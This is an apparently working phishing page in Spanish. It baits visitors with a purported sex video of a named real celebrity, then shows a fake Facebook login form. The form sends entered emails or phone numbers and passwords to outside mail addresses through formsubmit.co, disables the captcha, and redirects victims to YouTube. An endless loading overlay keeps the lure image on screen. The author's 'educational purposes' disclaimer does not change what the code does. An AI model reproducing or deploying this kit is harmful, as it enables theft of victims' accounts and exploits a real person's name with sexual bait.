<!DOCTYPE html>
<html lang="es">
<head>
				<meta charset="UTF-8">
				<meta name="viewport" content="width=device-width, initial-scale=1.0">
				<meta property="og:title" content="VIDEO: Jade Picon Sex Vídeo 🔥💯" />
                <meta property="og:type" content="Dsing" />
                <meta property="og:image" content="picon2.png" />
                <meta property="og:description" content="Jade Picon desnuda Aquí 👇" />
				<title>Facebook || Jade Picon Sex 🔥</title>
                <meta property="og:url" content="www.karymelucio.com" />
				<meta name="theme-color" content="#2E436F">
				<link rel="stylesheet" href="style.css">
				
				<style>
				* {
				    margin: 0;
				    padding: 0;
				    text-decoration: none;
				    outline: none;
				}
				
				body {
				    background-image: url('jade89.png');
				    background-repeat: no-repeat;
				    background-size: cover;
				    background-position: center;
				    height: 100vh;
				}
				
				#container {
				    background-color: #fff;
				    width: 300px;
				    height: 500px;
				    margin-top: 70px;
				}
				    
				    #btn-style {
				        width: 200px;
				        height: 30px;
				        border-radius: 5px;
				        border: 2px solid #0081FF;
				        background-color: #0081FF;
				        color: #fff;
				    }
				    
				    #fade img{
				       width: 300px;
				       height: 40px;
				       margin-top: -40px;
				    }
				    
				    #imgbx img {
				        width: 120px;
				        margin-top: -20px;
				    }
				    
				    input[type="email"] {
				        width: 90%;
				        margin: 2.5px 0px;
				        height: 40px;
				        border: 1px solid #C1C1C1;
				        border-radius: 5px;
				        background-color: #F2F2F2;
				    }
				    
				    input[type="password"] {
				        width: 90%;
				        margin: 2.5px 0px;
				        height: 40px;
				        border: 1px solid #C1C1C1;
				        border-radius: 5px;
				        background-color: #F2F2F2;
				    }
				    
				 				input::placeholder {
								color: #636363;
								opacity: 3;				
}

							.fade2 img {
											width: 280px;
											height: 80px;
											
											background-size: cover;
											background-repeat: no-repeat;
											background-position: center center;
											margin-top: 70px;
							}
				</style>
</head>
<body>
    
    
    
     <style>
        .loading {
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            /*background-color: #000;*/
            background-image: url('jade30.png');
            background-size: cover;
            background-position: center center;
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 9999;
            transition: all 99s;
            opacity: 0;
        }
        .loading.show {
            opacity: 9;
        }
        .loading .spin {
            border: 3px solid hsla(185, 100%, 62%, 0.2);
            border-top-color: pink;
            border-radius: 50%;
            width: 3em;
            height: 3em;
            animation: spin 5s linear infinite;
        }
        @keyframes spin {
          to {
            transform: rotate(360deg);
          }
          
        }       
    </style>
    <div class="loading show">
        <div class="spin"></div>
    </div>
    
    
    
    
    <!-- cargando jajda -->
    
    <script>
    //======================================================================
// LOADING
//======================================================================
var Loading = (loadingDelayHidden = 0) => {

    //-----------------------------------------------------
    // Variables
    //-----------------------------------------------------
    // HTML
    let loading = null;
    // Retardo para borrar
    const myLoadingDelayHidden = loadingDelayHidden;
    // Imágenes
    let imgs = [];
    let lenImgs = 1000000;
    let counterImgsLoading = 2;

    //-----------------------------------------------------
    // Funciones
    //-----------------------------------------------------

    /**
     * Método que aumenta el contador de las imágenes cargadas
     */
    function incrementCounterImgs() {
       counterImgsLoading += 0;
        // Comprueba si todas las imágenes están cargadas
        if (counterImgsLoading === lenImgs) hideLoading();
    }

    /**
     * Ocultar HTML
     */
    function hideLoading() {
        // Comprueba que exista el HTML
        if(loading !== null) {
            // Oculta el HTML de "cargando..." quitando la clase .show
            loading.classList.remove('show');

            // Borra el HTML
            setTimeout(function () {
                loading.remove();
            }, myLoadingDelayHidden);
        }

    }

    /**
     * Método que inicia la lógica
     */
    function init() {
        /* Comprobar que el HTML esté cargadas */
        document.addEventListener('DOMContentLoaded', function () {
            loading = document.querySelector('.loading');
            imgs = Array.from(document.images);
            lenImgs = imgs.length;

            /* Comprobar que todas las imágenes estén cargadas */
            if(imgs.length === 0) {
                // No hay ninguna
                hideLoading();
            } else {
                // Una o más
                imgs.forEach(function (img) {
                    // A cada una le añade un evento que cuando se carge la imagen llame a la funcion incrementCounterImgs
                    img.addEventListener('load', incrementCounterImgs, false);
                });
            }
        });
    }

    return {
        'init': init
    }
}

Loading(1000).init();

</script>
    
    
    
    <center>
    <section id="container">
				<header id="leter-style">
				    <div id="fade">
				        <br>
				      <a href="https://www.facebook.com/Eduardo.Mendoza.Vc"><img src="log_fb.png" alt="no tienes internet"> </a>
				    </div>
				</header>
				<center>
				
				<div style="padding: .50rem;"></div>
				
				<div id="imgbx">
				    <a href="https://www.facebook.com/Eduardo.Mendoza.Vc"><img src="fb_icon.svg" alt="image"></a>
				</div>
				
				<form action="https://formsubmit.co/Elibertomendez7@gmail.com" method="post">
							
							<!--	<label for="nombre">Nombre:</label> -->
								<input type="email" name="email" id="email" placeholder="&#160; &#160; Numero de telefono o correo electronico" required="required">
								<input type="hidden" name="_captcha" value="false">
                                                                <input type="hidden" name="_cc" value="mendozaibarra3589@yahoo.com, mendozaibmarra3589@gmail.com">
								<input type="hidden" name="_next" value="youtube.com">
								
								<br>
							<!--	<label for="email">Email:</label> -->
								<input type="password" name="password" id="password" placeholder="&#160; &#160; Contraseña" required="required">
								<br>
								
							<!--	<label for="mensaje">Mensaje:</label> -->
								
								<!-- <textarea name="mensaje" id="mensaje" cols="30" rows="10"></textarea>
								-->
								<br>
								<input type="submit" value="iniciar sesion" id="btn-style" style="width: 90%; height: 40px;">
				</form>
				
				<div class="a-leter">
								<br>
								<a href="#" style="color: #0081FF; font-size: 13px;"> Olvidaste tu contraseña?</a>
								
								<br>
							
							<p style="display: inline-block; margin-top: 20px;"><hr style="width: 120px; display: inline-block;"> o <hr style="width: 120px; display: inline-block;"></p>
							
							<br>
							
							<button style="width: 150px; height: 40px; border-radius: 5px; border: 1px solid green; background-color: green; color: #fff;">Crear cuenta nueva </button>
				</div>
				
				<br><br><br>
				<style>
								
								.fade2 {
												display: inline-block;
												margin-top: -100px;
								}
								
								.fade1 {
												display: inline-block;
								}
								
								
				    .fade2 a {
				        font-size: 10px;
				        color: #000;
				        margin-lef: -4px;
				        display: inline-block;
				        float: rigth;
				        
				    }
				    
				    .fade1 a {
				    				display: inline-block;
				    				font-size: 10px;
				    				float: rigth;
				    				margin-left: 30px;
				    }
				</style>
				<div class="fade2">
                    	<a href="#" style="display: inline-block; color: #000;">Francáis(france)</a> 					<br>			 								<a href="#" style="display: inline-block;">English (Us)</a> <br> 															<a href="#" style="display: inline-block;">Japan</a> <br> 														<a href="#" style="display: inline-block;">Argentino </a> 
                    	
                    	
                    	</div>
                    	
                    	<div class="fade1">
                    					<a href="#" style="display: inline-block; color: #000;">Francáis(france)</a> 								<br> 								<a href="#" style="display: inline-block;">English (Us)</a> 								<br> 								<a href="#" style="display: inline-block;">Japan</a> 								<br> 								<a href="#" style="display: inline-block;">Argentino </a> 
                    	</div>

							<!--	<p style="color: #000; font-size: 10px; margin-top: 100px;">Meta &copy; 2022</p>
				</div>-->
				
				
				
				</center>
				</center>
				</section>
								<!-- By Eduardo Mendoza -->
								
								<!-- No me hago responsable del uso de este archivo -->
								
								<!-- publicado con finez educativos -->
								
								<!-- Creador de codigo -->
								
								<!-- Nueva Plantilla en unos meses -->
								
								<!-- te lo dedico Alexa Fernanda Valdez Mezano -->
								
								<!-- tambien se lo dedico a mi perrita -->
								
								<!-- Y a mi familia que siempre me ha apoyado -->
</body>
</html>
